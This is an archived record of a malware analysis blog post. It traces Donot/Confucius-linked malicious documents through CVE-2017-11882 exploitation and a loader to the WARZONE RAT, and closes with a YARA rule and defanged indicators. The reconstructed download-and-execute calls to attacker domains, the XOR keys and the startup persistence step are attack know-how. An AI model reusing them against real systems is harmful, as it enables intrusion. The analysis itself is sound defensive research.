{
	"id": "70691382-a008-436e-a7c5-a9261a7e6e9c",
	"created_at": "2026-04-06T00:13:54.123814Z",
	"updated_at": "2026-04-10T03:33:38.163259Z",
	"deleted_at": null,
	"sha1_hash": "36933d357cc568dc45f5601b7c4f11041ff4a94f",
	"title": "Do you want to bake a donut? Come on, let’s go update~ Go away, Maria.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 12315270,
	"plain_text": "Do you want to bake a donut? Come on, let’s go update~ Go away,\r\nMaria.\r\nBy asuna amawaka\r\nPublished: 2020-11-30 · Archived: 2026-04-05 20:48:22 UTC\r\nNov 30, 2020\r\nI have not done any proper analysis for a while now, so here I am, trying to keep my itchy fingers busy after\r\ngetting revved up by FlareOn last month.\r\nI saw this interesting post [1] and jumped right into it.\r\nPreliminary research got me these:\r\nhttps://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1\r\nPage 1 of 35\n\nI found additional samples on VirusTotal using the RTF creation date: 2019:12:26 11:48:00\r\nThese samples are related to the same threat actor because of the overlapping C2 domains used, the similarities in\r\nfile naming and the same payload deployed.\r\nAfter pivoting and researching, “Donot” and “Confucius” are two APT names that are closely related to the\r\nsamples found. I don’t have enough data on my hands to say if these two groups are the same or if they are simply\r\nsharing infrastructure. Nonetheless, I shall concentrate on technical analysis while folks with more telemetry can\r\nworry about attribution.\r\nThe maldocs deployed by the actor use the following techniques to initiate the infection: template injection,\r\nmacros and/or exploits (e.g. CVE-2017-11882). After going through some trouble of\r\ndeobfuscating/decoding/decrypting strings and code, the final payload (AVEMARIA, aka WARZONE RAT) is\r\nfetched and executed in one of two ways. 
One is via a loader (which comes as a pair of files made up of a DLL and an\r\nXOR-encrypted data file), which I named DonutLoader since there is no existing catchy name for this; the\r\nother way is via a different pair of files made up of a shellcode and a gif.\r\nThis long post shall be organized in this manner:\r\nTemplate injection\r\nMalicious RTFs (walkthrough of my analysis of the shellcode deployed by the exploits) to execute\r\nDonutLoader and/or AVEMARIA\r\nMacros to execute DonutLoader\r\nDonutLoader Analysis\r\nBrief comment on AVEMARIA\r\nTemplate Injection\r\nIn the case of “Suparco Vacancy Notification.docx”, the next stage malicious RTF is downloaded via relationship\r\ntemplates.\r\nThe exact same settings.xml.rels file is observed within “Testing.docx”.\r\n“mal testin.docx” contains a different download link:\r\nMalicious RTFs and the shellcode within\r\nRTF: 8E85C62E5D7FA9A6D2E176BCA6F6526B53EBFDA6EF3DF208E1E60434BD26EFFC\r\nThe file “IN4447832” is a malicious RTF that downloads a pair of gif/shellcode files that in turn download the\r\nfinal payload. The whole series of activities is triggered by the exploitation of CVE-2017-11882. Let’s see how\r\nit’s done.\r\nAt the end of the RTF file, we can see an embedded object:\r\nExtract this object and look at it again:\r\nThere it is, an exploit for the equation editor. We can find the beginning of the exploit shellcode after identifying\r\nthe “Font record” header (0x8 denotes a Font record). Put it into IDA:\r\nWe can follow where the instruction pointer goes within a debugger. GFlags comes in handy again for this. 
Set the\r\ndebugger for “eqnedt32.exe” to “C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\cdb -server\r\ntcp:port=5505”, click Apply and OK.\r\nExecute the RTF file and, with WinDbg, connect to the remote session “tcp:port=5505,server=localhost”.\r\nPut a breakpoint “ba r4 0x45BD3C” (taken from the shellcode: 0x1271EB44 XOR 0x12345678), which will break\r\non read/write access to the address.\r\nWhen the breakpoint hits, we see this:\r\nThe shellcode followed the addresses three times; let’s do the same and arrive at:\r\nThat looks like the MTEF data followed by a font record, doesn’t it? The shellcode then jumps to offset 0x43 from\r\nhere, 0x5da358 + 0x43 = 0x5DA39B.\r\nNow, you know what to do. Put a breakpoint here of course.\r\n\u003e bp 0x5DA39B\r\nThe shellcode then did a little “polymorphism” and we find out that deobfuscation is done on the last 0x315 bytes\r\nof the extracted object — first a NOT, followed by XOR 0xE0.\r\nAfter deobfuscation, we can then see the strings and code:\r\nAnalyzing the deobfuscated code shows that the file “updte” is another shellcode that executes code\r\n(again, XOR encrypted) in sant.gif.\r\nThe decryption within updte goes like this:\r\nWhich leads to me 
writing this little piece of python script to assist in decrypting the gif file:\r\nAfter decryption, the data looks like the following. But somehow, some parts of it look like they are still\r\nobfuscated…\r\nWell, IDA confirms our suspicions.\r\nEasy!\r\nRTF: 686847B331ACE1B93B48528BA50507CBF0F9B59AEF5B5F539A7D6F2246135424\r\nThe file “KB466432” is also a malicious RTF that executes a loader via exploitation of eqnedt32. This is different\r\nfrom the RTF I analyzed above.\r\nA cursory look at the RTF reveals an embedded object like this:\r\nWhich turns out to be a PE named “muka.dll”. Take note of the path “C:\\Users\\Dev\\Desktop\\07082020_8570_S\\”\r\nThen there is also this other embedded object. Notice how there is a very long NOP sled within, which hints to us\r\nthat this object is some code (probably the exploit):\r\nIndeed, when we inspect this object, there’s a suspicious “tion.3” string in there, which reminds us of\r\n“Equation.3”. Very likely, we are looking at a CVE-2017-11882 or CVE-2018-0802 exploit again. Let’s see what\r\nthe exploit tries to do. 
We can find the beginning of the exploit shellcode after identifying the “Font record”\r\nheader.\r\nIn the earlier RTF analysis, we found an address that leads to where the MTEF data is found. Maybe use it again\r\nhere:\r\n\u003e ba r4 0x45BD3C\r\nBingo!\r\nPut a breakpoint on where the shellcode begins (in this case, 0x618efa). But it didn’t get hit. Maybe it got copied\r\nsomewhere else before getting executed? Try\r\n\u003e ba r1 0x618efa\r\nLooks like we are right!\r\n\u003e bp 0x18f318\r\nNotice that the shellcode is seeking an address 2*0x7F from the MTEF header (0x5B8F0 + 0x7F + 0x7F),\r\npushes this address onto the stack, and then returns to this address.\r\nTaking a quick look at the shellcode in IDA, it seems that the shellcode is trying to load muka.dll.\r\nConfirm this with the debugger. The shellcode calls the export “zenu” of muka.dll.\r\nIt turns out that muka.dll is a DonutLoader. 
I’ll get to its analysis in a while.\r\nMacros and DonutLoader\r\nDonutLoader can also be embedded within the maldoc and executed via macro.\r\nmacro\r\nembedded object 1 filename\r\nembedded object 2 filename\r\nWithin 1d9ede11b34a20d4947f01432cea088dbefa911f02afaae9095673f56a76eafa, there are 2 embedded objects\r\n(as shown in the screen captures above):\r\n· C:\\Users\\Dev\\AppData\\Local\\Temp\\written.dll\r\n· C:\\Users\\Dev\\AppData\\Local\\Temp\\s\r\nNote also the paths “C:\\Users\\Dev\\Desktop\\Macro_Xls_1704_S” and\r\n“C:\\Users\\Dev\\Desktop\\01052020_MacroXlsEmb_S”, which will help us to find more samples.\r\nWritten.dll is a PE in plain, while s is a 0x98-XORed PE.\r\nembedded object 1: written.dll\r\nembedded object 2: s\r\nThese files are DonutLoaders. OK, coming up next is their analysis finally!\r\nDonutLoader\r\nThe name came about because I repeatedly mistyped the group name “Donot” as “Donut” when writing notes\r\nabout these samples. Folks at PTSecurity [2] did analysis on some similar samples and called them “Lo2 loaders”.\r\nOf the RTFs I found on VirusTotal, most have a pair of files embedded — a DLL and an XOR-encoded data file. 
The following collates all the DonutLoader samples that I looked at.\r\nThe DLL binaries make use of base64 and XOR operations to obfuscate their configuration data/strings so that our\r\nlives become a little bit harder.\r\nI was able to decode strings from these binaries with the help of a small python script:\r\nThis python script does the same thing as the one found in PT Security’s article, which said that this algorithm has\r\nbeen in use since October 2019.\r\nThere is one binary that is “odd”. It had the latest compilation datetime amongst the files I looked at (which were\r\ncompiled around Jun/Jul 2020). It uses a different algorithm to decode the strings.\r\nFrom within the DLL, the XOR-encoded file is read, decoded and executed.\r\nWithin this second XOR-encoded executable, the same tricks are used to obfuscate strings from our prying eyes,\r\nconsisting of base64 and XOR encoding, as well as byte additions. Interestingly, not all the strings can be\r\ndecoded. 
But from what could be decoded, we can see where the next stage malware is downloaded from.\r\nmuka.dll (SHA256: 1C41A03C65108E0D965B250DC9B3388A267909DF9F36C3FEFFFBD26D512A2126)\r\n(This file came from the RTF “KB466432”, SHA256:\r\n686847B331ACE1B93B48528BA50507CBF0F9B59AEF5B5F539A7D6F2246135424, analyzed above)\r\nThis particular DonutLoader is more straightforward than those that occur in a pair. It uses just one type of string\r\nobfuscation:\r\nA quick look at the deobfuscated strings:\r\nAt runtime, the strings are used in the following manner:\r\nCreateDirectoryA(“C:/intel”, ..)\r\nURLDownloadToFileA(…, “hxxp://wordupdate.com/recent/update”, “C:/intel/new.exe”, …)\r\nPersistence is established with a shortcut to execute new.exe at startup:\r\n“C:/Users/user/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/new.lnk”\r\nAVEMARIA\r\nThe final payload malware is in fact WARZONE RAT (researchers named it AVEMARIA because of this string\r\nfound within earlier versions of the RAT). Many folks have done analysis on this RAT so I’m not going to go into\r\na deep dive.\r\nSome findings that I found interesting regarding the AVEMARIAs executed by DonutLoader:\r\nThe PDB path is intentionally misleading. The path “VCSamples-master\\VC2010Samples\\ATL\\General\\ATLCollections\\Client” is identical to Microsoft’s “VCSamples”\r\nproject on Github, and the executable has nothing to do with what the path describes. I found lots of other\r\nAVEMARIAs based on PDBs like this. 
This could be part of the builder/encrypter in the WARZONE suite.\r\nMicrosoft’s VCSamples project on Github\r\nThe actual AVEMARIA payload (the one that calls back to the C2) is decoded and executed in memory, and\r\nI dumped it to look at the strings. The keyword “warzone160” can be found, and this dumped executable\r\nmatches YARA rules describing AVEMARIA.\r\nMany more similar AVEMARIAs calling back to the same C2 can be found on VirusTotal, with relations to\r\nthe known domain names used by the maldocs/DonutLoaders. Looks like AVEMARIA is a tool of choice\r\nfor this APT group.\r\nLast words\r\nAnalyzing this set of malicious docs and executables has been fun. I’ll just leave you all with a set of IOCs and a\r\nYARA rule for detecting DonutLoader. If anyone is interested in discussing, DM me on Twitter!\r\nimport \"pe\"\r\nrule MAL_DonutLoader_DonotAPT {\r\n    meta:\r\n        author = \"Asuna Amawaka\"\r\n        description = \"This rule hopes to capture parents of DonutLoader as well as DonutLoader binaries\"\r\n        date = \"30 Nov 2020\"\r\n    strings:\r\n        $filename1 = \"wavs.bin\" wide ascii nocase\r\n        $filename2 = \"ogg.bin\" wide ascii nocase\r\n        $filename3 = \"muka.dll\" wide ascii nocase\r\n        $filename4 = \"linknew.dll\" wide ascii nocase\r\n        $filename5 = \"kpryt.dll\" wide ascii nocase\r\n        $filename6 = \"cvent.dll\" wide ascii nocase\r\n        $filename7 = \"trui19o2.dll\" wide ascii nocase\r\n        $filename8 = \"lioj86.dll\" wide ascii nocase\r\n        $filename9 = \"fuitel.dll\" wide ascii nocase\r\n        $filename10 = \"dpur.dll\" wide ascii nocase\r\n        $filename11 = \"mecru.dll\" wide ascii nocase\r\n        $filename12 = \"eupol.dll\" wide ascii nocase\r\n        $filename13 = \"mentn.dll\" wide ascii nocase\r\n        $filename14 = \"made.dll\" wide ascii nocase\r\n        $filename15 = \"notr.dll\" wide ascii nocase\r\n        $filename16 = \"vetu.dll\" wide ascii nocase\r\n        $filename17 = \"detr.dll\" wide ascii nocase\r\n        $filename18 = \"bese.dll\" wide ascii nocase\r\n        $filename19 = \"NumberAlgo.dll\" wide ascii nocase\r\n        $filename20 = \"JacaPM.dll\" wide ascii nocase\r\n        $filename21 = \"maroork.dll\" wide ascii nocase\r\n        $filename22 = \"fli0.dll\" wide ascii nocase\r\n        $filename23 = \"nuityr.dll\" wide ascii nocase\r\n        $filename24 = \"jgasf.dll\" wide ascii nocase\r\n        $filename25 = \"tuyrt.dll\" wide ascii nocase\r\n        $filename26 = \"lefbu.dll\" wide ascii nocase\r\n        $filename27 = \"pult.dll\" wide ascii nocase\r\n        $filename28 = \"quep.dll\" wide ascii nocase\r\n        $filename29 = \"nmwell.dll\" wide ascii nocase\r\n        $filename30 = \"yello.dll\" wide ascii nocase\r\n        $filename31 = \"lokr.js\" wide ascii nocase\r\n        $filename32 = \"falin.js\" wide ascii nocase\r\n        $filename33 = \"obile.js\" wide ascii nocase\r\n        $filename34 = \"vqiw.js\" wide ascii nocase\r\n        $filename35 = \"gb.bat\" wide ascii nocase\r\n        $filename36 = \"iksm.bat\" wide ascii nocase\r\n        $filename37 = \"trrt.bat\" wide ascii nocase\r\n        $filename38 = \"blo.bat\" wide ascii nocase\r\n        $filename39 = \"SystemService.exe\" wide ascii nocase\r\n        $path1 = \"C:\\\\Users\\\\Dev\\\\Desktop\\\\07082020_8570_S\\\\\" wide ascii nocase\r\n        $path1_wild = {5c 55 73 65 72 73 5c 44 65 76 5c 44 65 73 6b 74 6f 70 5c [8] 5f [4] 5f 53 5c}\r\n        $path2 = \"AppData\\\\Roaming\\\\EvMGR\" wide ascii nocase\r\n        $path3 = \"C:\\\\Users\\\\Dev\\\\Desktop\\\\Macro_Xls_1704_S\" wide ascii nocase\r\n        $path3_wild = {5c 55 73 65 72 73 5c 44 65 76 5c 44 65 73 6b 74 6f 70 5c 4d 61 63 72 6f 5f 58 6c 73 5f [4] 5f 53}\r\n        $path4 = \"C:\\\\Users\\\\Dev\\\\Desktop\\\\01052020_MacroXlsEmb_S\" wide ascii nocase\r\n        $path4_wild = {5c 55 73 65 72 73 5c 44 65 76 5c 44 65 73 6b 74 6f 70 5c [8] 5f 4d 61 63 72 6f 58 6c 73 45 6d 62 5f 53}\r\n        $str1 = \"MJuego\" wide ascii nocase\r\n        $str2 = \"0007E9E4CE4D\" wide ascii nocase\r\n        $str3 = \"Bensun\" wide ascii nocase\r\n        $str4 = \"Menner\" wide ascii nocase\r\n        $pdbpath1 = \"Soft\\\\DevelopedCode_Last\\\\BitDefenderTest\\\\m0\\\\New_Single_File\\\\Lo2\\\\SingleV2\\\\Release\\\\BinWork.pdb\" wide ascii nocase\r\n        $pdbpath1_wild = {5c 53 6f 66 74 5c 44 65 76 65 6c 6f 70 65 64 43 6f 64 65 5f 4c 61 73 74 5c 42 69 74 44 65 66 65 6e 64 65 72 54 65 73 74}\r\n        $pdbpath2 = \"Users\\\\admin\\\\Documents\\\\dll\\\\linknew\\\\Release\\\\linknew.pdb\" wide ascii nocase\r\n    condition:\r\n        uint16(0) == 0x5a4d and filesize \u003c 600KB and ((1 of ($filename*)) or (any of ($path*, $str*, $pdbpath*)) or pe.exports(\"zenu\") or pe.exports(\"flis\") or pe.exports(\"jrgbeg\") or pe.exports(\"csytu\") or pe.exports(\"neeu\") or pe.exports(\"vile\"))\r\n}\r\nwordupdate[.]com/recent/update\r\ncheaperlive[.]xyz/xolto/mikix\r\ntampotrust[.]top/tax/lodi/pkra\r\nremindme[.]top/tax/lodi/pkra\r\nrecent.wordupdate[.]com/ver/update12/KB466432\r\nthe-moondelight[.]96[.]lt/latest/updte\r\nthe-moondelight[.]96[.]lt/optra/sant.gif\r\nthe-moondelight[.]96[.]lt/latest/version/secure/download/IN4447832\r\nthe-moondelight[.]96[.]lt/windw-sec/append\r\n1C41A03C65108E0D965B250DC9B3388A267909DF9F36C3FEFFFBD26D512A2126\r\n8CFBFECFE475C3621277EE7F680E3A0CB9C650802363DAA256C1057ADFB817A9\r\n7A987295229D2514D99916D53F196B87758CE08FD8621CF68BC419DC99B80D6D\r\nD279DDB6B2A566BC24E789B5181663491B8C2818CB91E28AAE5721DCB0BF30B6\r\nAB04BF258CF71B4A1CB934491CF942ECDA0EC82D4F6A80B5108D7607BE6FC2BE\r\n7F4B7D0C6076E197A509C01C0794EBC450229FF5D555BE8D7F89F98B3C43A298\r\n684F68429F8BAC224E6FDC68195C89B54BA469FBCC2184EC2B5FC689E585CA54\r\n0EA05331E775DE6B329FF1FA22F11809C2C1BCB6E17683552219CB32F52A47F5\r\n83847C527F713B6E13849028D66B08686ADDE26B8E9ECD8DDC78AD178EF7BDCB\r\nE291A146F79D927D18392A04D238D829C0DF156410E4D93636AEE1B5663DB914\r\nE6753EB498F58F95C8FC931B6CD53647CE2F4F8F7AD4274C22CA2B6284FB5308\r\n67C0C937E049083193649449519A57E42945CA2ABE19756F4E76D95CAA44A062\r\n70D41C8C25CB8E75296576D3DBB37720E03F96691691763953FEA0FE00F50EB4\r\n9B34F53DDC20D5EA2F7B47818ED2E7D626948256268CB4E2B11E47ECAF9A839A\r\n891ACF7B729183945F209C915BA2BB57B541E2EA350899A541DB9A63428711A5\r\nFB46324757D0EC8B0AC02729E281E47EF1C367DEED483F14481441C2F9B6CA34\r\n66F3134E3E040F50ED59629379C0750D896969ACFDC55105BE7FEF81839BA035\r\n1C4B8A1F48FF1B9511AEC0704983E45242F01C2109AB4602F7952481429DDC84\r\n88672DF33B02275660EC3995F3BAD63FE994C09BA8E978E7F18D4F8C9A97637A\r\n7609034E7473869B3A5767F9543B6067998F4DB68E3BA26966C115535337337F\r\nADE6D291C870A9F59D4A22FF4D61E6B2A913538701517E8D0AA275855FD80A76\r\nE99AE9163F6DBBA22E1357C2164EB0F9971A264A481813EC11DC598784435B95\r\n1E6E568E2FCCFEB2E0275982D5637E0BE6D0BA4575685126D957061BF2D19678\r\n4C5C43F4932AC497C716BB5EC30A7636E5056775A4D5F3F48B9E5C1414B9F7B3\r\n7305E08AB7812F44EA42E89AE7D473B1F373C151CA8D12F77B79E85C942366FC\r\n59CCFFF73BDB8567E7673A57B73F86FC082B0E4EEAA3FAF7E92875C35BF4F62C\r\nA3CD781B14D75DE94E5263CE37A572CDF5FE5013EC85FF8DAEEE3783FF95B073\r\n904E966DA7B38514F6AC23BBA1DAC1858888CD48FA77B73C770156B19A88A4C8\r\n8E85C62E5D7FA9A6D2E176BCA6F6526B53EBFDA6EF3DF208E1E60434BD26EFFC\r\n5C9477C16DF8EF4434C042E69B473A44452CAEE96219A56EB2DA30F0B5E85976\r\n686847B331ACE1B93B48528BA50507CBF0F9B59AEF5B5F539A7D6F2246135424\r\n1D9EDE11B34A20D4947F01432CEA088DBEFA911F02AFAAE9095673F56A76EAFA\r\nSource: https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1"
	],
	"report_names": [
		"do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4",
			"created_at": "2025-08-07T02:03:25.123407Z",
			"updated_at": "2026-04-10T02:00:03.668131Z",
			"deleted_at": null,
			"main_name": "ZINC EMERSON",
			"aliases": [
				"Confucius ",
				"Dropping Elephant ",
				"EHDevel ",
				"Manul ",
				"Monsoon ",
				"Operation Hangover ",
				"Patchwork ",
				"TG-4410 ",
				"Viceroy Tiger "
			],
			"source_name": "Secureworks:ZINC EMERSON",
			"tools": [
				"Enlighten Infostealer",
				"Hanove",
				"Mac OS X KitM Spyware",
				"Proyecto2",
				"YTY Backdoor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7a8dbc5e-51a8-437a-8540-7dcb1cc110b8",
			"created_at": "2022-10-25T16:07:23.482856Z",
			"updated_at": "2026-04-10T02:00:04.627414Z",
			"deleted_at": null,
			"main_name": "Confucius",
			"aliases": [
				"G0142"
			],
			"source_name": "ETDA:Confucius",
			"tools": [
				"ApacheStealer",
				"ByeByeShell",
				"ChatSpy",
				"Confucius",
				"MY24",
				"Sneepy",
				"remote-access-c3",
				"sctrls",
				"sip_telephone",
				"swissknife2"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "caf95a6f-2705-4293-9ee1-6b7ed9d9eb4c",
			"created_at": "2022-10-25T15:50:23.472432Z",
			"updated_at": "2026-04-10T02:00:05.352882Z",
			"deleted_at": null,
			"main_name": "Confucius",
			"aliases": [
				"Confucius",
				"Confucius APT"
			],
			"source_name": "MITRE:Confucius",
			"tools": [
				"WarzoneRAT"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434434,
	"ts_updated_at": 1775792018,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/36933d357cc568dc45f5601b7c4f11041ff4a94f.pdf",
		"text": "https://archive.orkl.eu/36933d357cc568dc45f5601b7c4f11041ff4a94f.txt",
		"img": "https://archive.orkl.eu/36933d357cc568dc45f5601b7c4f11041ff4a94f.jpg"
	}
}